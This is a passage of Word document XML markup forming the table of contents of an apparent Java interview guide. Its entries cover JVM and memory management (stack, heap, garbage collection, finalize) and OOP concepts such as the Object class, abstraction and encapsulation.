            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>151</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3356C18D" w14:textId="05F3F252" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307571" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java Memory Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307571 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="224C0E79" w14:textId="7DC0A3C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7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JDK, JRE?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307572 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AD40009" w14:textId="09290F0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7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JVM?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307573 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12124F6F" w14:textId="14FCBFE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7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are the different loaders in JVM?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307574 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="637E19F5" w14:textId="3CE8F5A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7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JVM profiling?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307575 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>155</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77B6B487" w14:textId="41007C3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7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Java memory management?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307576 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>156</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="373887CB" w14:textId="7A91F37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7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Stack and Heap memory?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307577 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>157</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EBE4E31" w14:textId="3DF131D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7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memory management below? Int and Integer?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307578 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>158</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35CA604E" w14:textId="0556CA9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7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ere local variables are stored in memory?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307579 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>159</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2FDD5426" w14:textId="2573025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8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ere objects will be stored in memory?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307580 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>160</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58F1F80A" w14:textId="4061AA6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8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Heap memory in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307581 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55C5875A" w14:textId="30C3662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8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Stack and Heap?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307582 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15E65ADE" w14:textId="3DFF435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8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Garbage Collection in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307583 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>162</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4138C1F4" w14:textId="6711DC0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8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will happen if I assign null to some object then will that be garbage collected?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307584 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>163</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3975762C" w14:textId="1D33D91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8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en does the finalize method get called?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307585 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>164</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A43493A" w14:textId="685A37CD" w:rsidR="00012799" w:rsidRDefault="00012799">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10194"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196307586" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>OOPs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307586 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="325D2EB5" w14:textId="09C8C58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8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OOPs concept?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307587 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BD59A2A" w14:textId="36ADE5F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8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an object?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307588 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C8810E2" w14:textId="238A582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8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method in Object class? Explain 9 methods in Object class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307589 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AFC567D" w14:textId="7C284D9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9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many ways can we create objects of class in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307590 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>167</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D8ECF95" w14:textId="7582C83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9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Abstraction?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307591 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>168</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ABE3643" w14:textId="29273C6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9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Encapsulation? Explain with a real time example</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307592 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>169</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E34657B" w14:textId="27A5716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93" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cstheme="minorHAnsi"/>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do we achieve encapsulation in Java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307593 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>170</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B2601E9" w14:textId="18A2E57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94" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cstheme="minorHAnsi"/>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abstract in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307594 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
